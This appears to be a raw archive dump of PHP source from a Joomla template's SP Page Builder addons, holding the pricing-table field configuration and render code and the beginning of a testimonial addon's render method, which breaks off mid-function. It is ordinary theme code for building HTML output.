SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_pricing',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PRICING'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PRICING_DESC'),
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'title'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PRICING_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PRICING_TITLE_DESC'),
					'std'=>'Basic',
				),

				'price'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PRICING_PRICE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PRICING_PRICE_DESC'),
					'std'=>'29',
				),
				
				'currency'=>array(
					'type'=>'text', 
					'title'=>JText::_('FLEX_ADDON_PRICING_CURRENCY'),
					'desc'=>JText::_('FLEX_ADDON_PRICING_CURRENCY_DESC'),
					'std'=>'$',
				),

				'duration'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PRICING_DURATION'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PRICING_DURATION_DESC'),
					'std'=>' /Month',
				),

				'pricing_content'=>array(
					'type'=>'textarea',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PRICING_FEATURES'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PRICING_FEATURES_DESC'),
					'std'=>'',
				),

				'background'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_COLOR_DESC'),
				),

				'color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_COLOR_DESC'),
				),

				//Button
				'button_text'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT_DESC'),
					'std'=>'Button Text',
				),

				'button_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_FONT_FAMILY'),
					'depends'=>array(array('button_text', '!=', '')),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-btn { font-family: {{ VALUE }}; }'
					)
				),

				'button_font_style'=>array(
					'type'=>'fontstyle',
					'title'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_FONT_STYLE'),
					'depends'=> array(
						array('button_text', '!=', ''),
					)
				),

				'button_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0',
					'depends'=> array(
						array('button_text', '!=', ''),
					)
				),
				
				'button_url'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL_DESC'),
					'placeholder'=>'http://',
					'depends'=> array(
						array('button_text', '!=', ''),
					)
				),

				'button_target'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_SAME_WINDOW'),
						'_blank'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_NEW_WINDOW'),
					),
					'depends'=> array(
						array('button_text', '!=', ''),
					)
				),

				'button_type'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE_DESC'),
					'values'=>array(
						'default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
						'flex'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
						'dark'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DARK'),
						'light'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LIGHT'),
						'primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
						'success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
						'info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
						'warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
						'danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
						'link'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
						'custom'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CUSTOM'),
					),
					'std'=>'default',
					'depends'=> array(
						array('button_text', '!=', ''),
					)
				),

				'button_appearance'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_FLAT'),
						'gradient'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_GRADIENT'),
						'outline'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_OUTLINE'),
						'3d'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_3D'),
					),
					'std'=>'flat',
					'depends'=> array(
						array('button_text', '!=', ''),
					)
				),

				'button_status'=>array(
					'type'=>'buttons',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ENABLE_BACKGROUND_OPTIONS'),
					'std'=>'normal',
					'values'=>array(
						array(
							'label' => 'Normal',
							'value' => 'normal'
						),
						array(
							'label' => 'Hover',
							'value' => 'hover'
						),
					),
					'tabs' => true,
					'depends'=>array(
						array('button_text', '!=', ''),
						array('button_type', '=', 'custom'),
					)
				),
	
				'button_background_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_DESC'),
					'std' => '#4060FF',
					'depends'=>array(
						array('button_appearance', '!=', 'gradient'),
						array('button_text', '!=', ''),
						array('button_type', '=', 'custom'),
						array('button_status', '=', 'normal'),
					),
				),
	
				'button_background_gradient'=>array(
					'type'=>'gradient',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
					'std'=> array(
						"color" => "#B4EC51",
						"color2" => "#429321",
						"deg" => "45",
						"type" => "linear"
					),
					'depends'=>array(
						array('button_text', '!=', ''),
						array('button_appearance', '=', 'gradient'),
						array('button_type', '=', 'custom'),
						array('button_status', '=', 'normal'),
					)
				),
	
				'button_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_DESC'),
					'std' => '#4060FF',
					'depends'=>array(
						array('button_text', '!=', ''),
						array('button_type', '=', 'custom'),
						array('button_status', '=', 'normal'),
					),
				),
	
				'button_background_color_hover'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER_DESC'),
					'std' => '#4060FF',
					'depends'=>array(
						array('button_appearance', '!=', 'gradient'),
						array('button_text', '!=', ''),
						array('button_type', '=', 'custom'),
						array('button_status', '=', 'hover'),
					),
				),
	
				'button_background_gradient_hover'=>array(
					'type'=>'gradient',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
					'std'=> array(
						"color" => "#429321",
						"color2" => "#B4EC51",
						"deg" => "45",
						"type" => "linear"
					),
					'depends'=>array(
						array('button_text', '!=', ''),
						array('button_appearance', '=', 'gradient'),
						array('button_type', '=', 'custom'),
						array('button_status', '=', 'hover'),
					)
				),
	
				'button_color_hover'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER_DESC'),
					'std' => '#fff',
					'depends'=>array(
						array('button_text', '!=', ''),
						array('button_type', '=', 'custom'),
						array('button_status', '=', 'hover'),
					),
				),

				'button_size'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DEFAULT'),
						'lg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_LARGE'),
						'xlg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_XLARGE'),
						'sm'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_SMALL'),
						'xs'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_EXTRA_SAMLL'),
					),
					'depends'=> array(
						array('button_text', '!=', ''),
					)
				),
				'button_padding'=>array(
					'type'=>'padding',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_PADDING'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_PADDING_DESC'),
					'responsive'=>true,
					'depends'=> array(
						array('button_text', '!=', ''),
						array('button_type', '=', 'custom'),
					)
				),

				'button_shape'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_DESC'),
					'values'=>array(
						'rounded'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUNDED'),
						'square'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_SQUARE'),
						'round'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUND'),
					),
					'depends'=> array(
						array('button_text', '!=', ''),
					)
				),

				'button_block'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK_DESC'),
					'values'=>array(
						''=>JText::_('JNO'),
						'sppb-btn-block'=>JText::_('JYES'),
					),
					'depends'=> array(
						array('button_text', '!=', ''),
					)
				),
				
				'peicon_name'=>array( // Pixeden Icons
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME_DESC'),
					'depends'=> array(
						array('button_text', '!=', ''),
					),
					'values'=> $peicon_list
				),
				
				'button_icon'=>array(
					'type'=>'icon',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME_DESC'),
					'depends'=> array(
						array('button_text', '!=', ''),
					)
				),

				'button_icon_position'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_POSITION'),
					'values'=>array(
						'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'depends'=> array(
						array('button_text', '!=', ''),
					)
				),
				
				'border_radius'=>array(
					'type'=>'number',
					'title'=>JText::_('FLEX_ADDON_PRICING_BORDER_RADIUS'),
					'desc'=>JText::_('FLEX_ADDON_PRICING_BORDER_RADIUS_DESC'),
					//'std'=>'5',
					'placeholder'=>'5',
				),
				
				'header_color'=>array(
					'type'=>'color', 
					'title'=>JText::_('FLEX_ADDON_PRICING_HEADER_COLOR'),
					'desc'=>JText::_('FLEX_ADDON_PRICING_HEADER_COLOR_DESC'),
					),
				
				// Is Featured
				'featured'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PRICING_FEATURED'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PRICING_FEATURED_DESC'),
					'values'=>array(
						''=>JText::_('JNO'),
						'sppb-pricing-featured'=>JText::_('JYES'),
					),
					'std'=>'',
				),
				
				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT_DESC'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'sppb-text-left',
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

			),
		),
	)
);
PK!��UU U *flex/sppagebuilder/addons/pricing/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

class SppagebuilderAddonPricing extends SppagebuilderAddons {

	public function render() {

		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? $this->addon->settings->class : '';
		$title = (isset($this->addon->settings->title) && $this->addon->settings->title) ? $this->addon->settings->title : '';
		$heading_selector = (isset($this->addon->settings->heading_selector) && $this->addon->settings->heading_selector) ? $this->addon->settings->heading_selector : 'h3';

		//Options
		$price = (isset($this->addon->settings->price) && $this->addon->settings->price) ? $this->addon->settings->price : '';
		$currency = (isset($this->addon->settings->currency) && $this->addon->settings->currency) ? $this->addon->settings->currency : '';
		$duration = (isset($this->addon->settings->duration) && $this->addon->settings->duration) ? $this->addon->settings->duration : '';
		$pricing_content = (isset($this->addon->settings->pricing_content) && $this->addon->settings->pricing_content) ? $this->addon->settings->pricing_content : '';
		$button_text = (isset($this->addon->settings->button_text) && $this->addon->settings->button_text) ? $this->addon->settings->button_text : '';
		$button_url = (isset($this->addon->settings->button_url) && $this->addon->settings->button_url) ? $this->addon->settings->button_url : '';
		$button_classes = (isset($this->addon->settings->button_size) && $this->addon->settings->button_size) ? ' sppb-btn-' . $this->addon->settings->button_size : '';
		$button_classes .= (isset($this->addon->settings->button_type) && $this->addon->settings->button_type) ? ' sppb-btn-' . $this->addon->settings->button_type : '';
		$button_classes .= (isset($this->addon->settings->button_shape) && $this->addon->settings->button_shape) ? ' sppb-btn-' . $this->addon->settings->button_shape: ' sppb-btn-rounded';
		$button_classes .= (isset($this->addon->settings->button_appearance) && $this->addon->settings->button_appearance) ? ' sppb-btn-' . $this->addon->settings->button_appearance : '';
		$button_classes .= (isset($this->addon->settings->button_block) && $this->addon->settings->button_block) ? ' ' . $this->addon->settings->button_block : '';
		$button_block = (isset($this->addon->settings->button_block ) && $this->addon->settings->button_block ) ? $this->addon->settings->button_block  : '';
		// Pixeden icons
		$peicon_name = (isset($this->addon->settings->peicon_name) && $this->addon->settings->peicon_name) ? $this->addon->settings->peicon_name : '';
		$button_icon = (isset($this->addon->settings->button_icon) && $this->addon->settings->button_icon) ? $this->addon->settings->button_icon : '';
		$button_icon_position = (isset($this->addon->settings->button_icon_position) && $this->addon->settings->button_icon_position) ? $this->addon->settings->button_icon_position: 'left';
		$button_position = (isset($this->addon->settings->button_position) && $this->addon->settings->button_position) ? $this->addon->settings->button_position : '';
		$button_attribs = (isset($this->addon->settings->button_target) && $this->addon->settings->button_target) ? ' target="' . $this->addon->settings->button_target . '"' : '';
		$button_attribs .= (isset($this->addon->settings->button_url) && $this->addon->settings->button_url) ? ' href="' . $this->addon->settings->button_url . '"' : '';
		$alignment = (isset($this->addon->settings->alignment) && $this->addon->settings->alignment) ? $this->addon->settings->alignment : '';
		$border_radius = (isset($this->addon->settings->border_radius) && $this->addon->settings->border_radius) ? $this->addon->settings->border_radius : '';
		$background = (isset($this->addon->settings->background) && $this->addon->settings->background) ? $this->addon->settings->background : '';
		$color = (isset($this->addon->settings->color) && $this->addon->settings->color) ? $this->addon->settings->color : '';
		$header_color = (isset($this->addon->settings->header_color) && $this->addon->settings->header_color) ? $this->addon->settings->header_color : '';
		$features_color = (isset($this->addon->settings->features_color) && $this->addon->settings->features_color) ? $this->addon->settings->features_color : '';
		
		$featured = (isset($this->addon->settings->featured) && $this->addon->settings->featured) ? $this->addon->settings->featured : '';
		
		$style = '';
		$table_border_radius = '';
		$header_border_radius = '';
		$duration_span = '';
		$header_style = '';
		$content_color = '';
		$currency_span = '';
		
		if($background) $style .= 'background-color:' . $background . ';border-color: ' . $background . ';';
		if($header_color) $header_style .= 'color:' . $header_color . ';';
		if($color) $content_color .= ' style="color:' . $color . ';"';
		if($border_radius != '') {
			$table_border_radius = 'border-radius:'.$border_radius.'px;';
			$header_border_radius = 'border-radius:'.$border_radius.'px '.$border_radius.'px 0 0;';
			if($class == 'flex') {
				$button_block != '' ? $button_block_radius = ' style="border-radius:0 0 '.$border_radius.'px '.$border_radius.'px;"' : '';
			}
		}
		
		if($class == 'flex') {
			$button_block != '' ? $button_block_padding = ' style="padding:0;"' : $button_block_padding = '';
		}
		
		if($button_icon_position == 'left') {
			if ($peicon_name != '') {
				$button_text = ($peicon_name) ? '<i class="pe ' . $peicon_name . '"></i> ' . $button_text : $button_text;
			}else{
				$button_text = ($button_icon) ? '<i class="fa ' . $button_icon . '"></i> ' . $button_text : $button_text;
			}
		} else {
			if ($peicon_name != '') {
				$button_text = ($peicon_name) ? $button_text . ' <i style="margin-left:7px;margin-right:-1px;" class="pe ' . $peicon_name . '"></i>' : $button_text;
			}else{
				$button_text = ($button_icon) ? $button_text . ' <i style="margin-left:5px;margin-right:-1px;" class="fa ' . $button_icon . '"></i>' : $button_text;
			}
		}

		$button_output = ($button_text) ? '<a' . $button_attribs . ' id="btn-'. $this->addon->id .'" class="sppb-btn' . $button_classes . '">' . $button_text . '</a>' : '';

		//Output
		$output  = '<div class="sppb-addon sppb-addon-pricing-table ' . $alignment . ' ' . $class . '">';
		
		$output .= '<div style="' . $style . $table_border_radius . '" class="sppb-pricing-box '. $featured .'">';
		$output .= '<div style="' . $header_border_radius . $header_style . '" class="sppb-pricing-header">';
	
		if($title) $output .= '<h1 class="sppb-pricing-title responsive">' . $title . '</h1>';
		
		if($currency) $currency_span = '<span class="sppb-pricing-currency">' . $currency . '</span>';
		if($duration) $duration_span = '<span class="sppb-pricing-duration">' . $duration . '</span>';
		if($price) $output .= '<h2 class="sppb-pricing-price">' . $currency_span . $price . $duration_span . '</h2>';
	
		$output .= '</div>';

		if($pricing_content) {
			$output .= '<div class="sppb-pricing-features">';
			$output .= '<ul'.$content_color.'>';

			$features = explode("\n", $pricing_content);

			foreach ($features as $feature) {
				$output .= '<li>' . $feature . '</li>';
			}

			$output .= '</ul>';
			$output .= '</div>';
		}

		$output .= '<div class="sppb-pricing-footer">';
		$output .= $button_output;
		$output .= '</div>';
		$output .= '</div>';
		$output .= '</div>';

		return $output;
	}

	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$css = '';
		$style = (isset($this->addon->settings->global_background_color) && $this->addon->settings->global_background_color) ? 'border: 0; background-color: '. $this->addon->settings->global_background_color .';' : '';

		if($style) {
			$css .= $addon_id . ' .sppb-pricing-box {';
			$css .= $style;
			$css .= '}';
		}

		// Button css
		$layout_path = JPATH_ROOT . '/components/com_sppagebuilder/layouts';
		$css_path = new JLayoutFile('addon.css.button', $layout_path);
		$css .= $css_path->render(array('addon_id' => $addon_id, 'options' => $this->addon->settings, 'id' => 'btn-' . $this->addon->id));

		return $css;
	}
}
PK!tN���.flex/sppagebuilder/addons/testimonial/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('Restricted access');

class SppagebuilderAddonTestimonial extends SppagebuilderAddons {

	public function render() {
		$settings = $this->addon->settings;
		$class = (isset($settings->class) && $settings->class) ? $settings->class : '';
		$class .= (isset($settings->alignment) && $settings->alignment) ? $settings->alignment : 'sppb-text-left';
		$style = (isset($settings->style) && $settings->style) ? $settings->style : '';
		$show_avatar = (isset($settings->show_avatar) && $settings->show_avatar) ? $settings->show_avatar : 1;
		$avatar_position = (isset($settings->alignment) && $settings->alignment) ? $avatar_position = $settings->alignment : $avatar_position = 'left';
		$style = (isset($settings->style) && $settings->style) ? $settings->style : '';
		$title = (isset($settings->title) && $settings->title) ? $settings->title : '';
		$heading_selector = (isset($settings->heading_selector) && $settings->heading_selector) ? $settings->heading_selector : 'h3';
		$show_quote = (isset($settings->show_quote)) ? $settings->show_quote : 1;

		//Options
		$review = (isset($settings->review) && $settings->review) ? $settings->review : '';
		$name = (isset($settings->name) && $settings->name) ? $settings->name : '';
		$company = (isset($settings->company) && $settings->company) ? $settings->company : '';
		$avatar = (isset($settings->avatar) && $settings->avatar) ? $settings->avatar : '';
		$avatar_size = (isset($settings->avatar_width) && $settings->avatar_width) ? $settings->avatar_width : '';
		
		$link = (isset($settings->link) && $settings->link) ? $settings->link : '';
		$link_target = (isset($settings->link_target) && $settings->link_target) ? ' target="' . $settings->link_target . '"' : '';
		$show_footer_link = (isset($settings->show_footer_link) && $settings->show_footer_link) ? $settings->show_footer_link : '';
		
		//Rating
		$client_rating_enable = (isset($settings->client_rating_enable)) ? $settings->client_rating_enable : '';
		$client_rating = (isset($settings->client_rating)) ? $settings->client_rating : '';
		
		$link != '' ? $active_link = '' : $active_link = ' inactive';
		$link_strip = preg_replace("/^(http:\/\/|https:\/\/)/", "", $link);

		//Output
		$output  = '<div class="sppb-addon sppb-addon-testimonial ' . $class . '">';
		$output .= ($title) ? '<'.$heading_selector.' class="sppb-addon-title">' . $title . '</'.$heading_selector.'>' : '';
		$output .= '<div class="sppb-addon-content">';

		if($style == 'flex') {
		$output .= '<div class="sppb-media flex">';
		
		if ($avatar_position != 'center') {
			
			if ($avatar) {
				
				if ($link != '') {
					$output .= '<a' . $link_target . ' class="pull-'.$avatar_position.'" href="'.$link.'" data-toggle="tooltip" data-placement="top" title="'.$link_strip.'">';
					$output .= '<img class="sppb-media-object" src="'.$avatar.'" width="' . $avatar_size . '" alt="'.$name.'">';
					$output .= '</a>';
				} else {
					$output .= '<img class="sppb-media-object pull-'.$avatar_position.'" src="'.$avatar.'" width="' . $avatar_size . '" alt="'.$name.'">';
					
				}
					
			} else {
				
				if ($link != '') {
				$output .= '<a' . $link_target . ' class="pull-'.$avatar_position.'" href="'.$link.'" data-toggle="tooltip" data-placement="top" title="'.$link_strip.'">';
				$output .= '<i style="width:' . $avatar_size . 'px;height:' . ( $avatar_size + 5 ) . 'px;line-height:' . ( $avatar_size + 3 ) . 'px;font-size:' . ( $avatar_size / 1.8 ) . 'px;" class="fa fa-user"></i>';
				$output .= '</a>';	
				} else {
					$output .= '<i style="width:' . $avatar_size . 'px;height:' . ( $avatar_size + 5 ) . 'px;line-height:' . ( $avatar_size + 3 ) . 'px;font-size:' . ( $avatar_size / 1.8 ) . 'px;" class="fa fa-user pull-'.$avatar_position.'"></i>';
				}
				
			}
		
		} else {
			if ($avatar) {
				if ($link != '') {
					$output .= '<a' . $link_target . ' class="pull-center" href="'.$link.'">';
					$output .= '<img class="sppb-media-object" src="'.$avatar.'" width="' . $avatar_size . '" alt="'.$name.'">';
					$output .= '</a>';
				} else {
					$output .= '<img class="sppb-media-object pull-center" src="'.$avatar.'" width="' . $avatar_size . '" alt="'.$name.'">';
				}
			} else {
				if ($link != '') {
				$output .= '<a' . $link_target . ' class="pull-center" href="'.$link.'">';
				$output .= '<i style="width:' . $avatar_size . 'px;height:' . ( $avatar_size + 1 ) . 'px;line-height:' . ( $avatar_size - 2 ) . 'px;font-size:' . ( $avatar_size / 1.8 ) . 'px;" class="fa fa-user"></i>';
				$output .= '</a>';	
				} else {
					$output .= '<i style="margin:0 auto;display:table;width:' . $avatar_size . 'px;height:' . ( $avatar_size + 1 ) . 'px;line-height:' . ( $avatar_size - 2 ) . 'px;font-size:' . ( $avatar_size / 1.8 ) . 'px;" class="fa fa-user centered"></i>';
				}
			}
			$output .= '<div class="div-pull-center clearfix"></div>';
		}
		
		$output .= '<div style="text-align:'.$avatar_position.'" class="sppb-media-body">';
		if($show_quote){
			$output .= '<i class="fa fa-quote-left'. $active_link .'"></i>';
		}
		$output .= $review;
		if($show_quote){
			$output .= '<i class="fa fa-quote-right'. $active_link .'"></i>';
		}
		if ($avatar_position != 'center') {
			$output .= '<footer class="pull-'.$avatar_position.'"><strong><em>'.$name.'</em></strong> <cite>'.$company.'</cite></footer>';
			
		} else {
			$output .= '<footer class="pull-center"><strong class="pull-center">'.$name.'</strong> <cite>'.$company.'</cite>';
			$output .= '</footer>';	
		}
		
		// Link bellow
		if($show_footer_link){
			$output .= $link ? '<div style="margin:8px auto;" class="row-fluid clearfix"></div><a' . $link_target . ' href="'.$link.'" ><em class="client-url">'.$link_strip.'</em></a>' : '';
		}
				// Rating
		if($client_rating_enable){
			$output .= '<div class="sppb-addon-testimonial-rating">';
			if($client_rating == 1){
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
			} elseif($client_rating == 2){
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
			} elseif($client_rating == 3){
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
			} elseif($client_rating == 4){
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
			} elseif($client_rating == 5){
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
			}
			$output .= '</div>';
		}

		$output .= '</div>';
		$output .= '</div>';

	
		} else {
	
		$output .= '<div class="sppb-media default">';
		
		if ($avatar_position != 'center') {
			
			if ($avatar) {
				if ($link != '') {
					$output .= '<a' . $link_target . ' class="pull-'.$avatar_position.'" href="'.$link.'">';
					$output .= '<img class="sppb-media-object" src="'.$avatar.'" width="' . $avatar_size . '" alt="'.$name.'">';
					$output .= '</a>';
				} else {
					$output .= '<img class="sppb-media-object pull-'.$avatar_position.'" src="'.$avatar.'" width="' . $avatar_size . '" alt="'.$name.'">';
				}
			} else {
				if ($link != '') {
				$output .= '<a' . $link_target . ' class="pull-'.$avatar_position.'" href="'.$link.'">';
				$output .= '<i style="width:' . $avatar_size . 'px;height:' . ( $avatar_size + 1 ) . 'px;line-height:' . ( $avatar_size - 2 ) . 'px;font-size:' . ( $avatar_size / 1.8 ) . 'px;" class="fa fa-user"></i>';
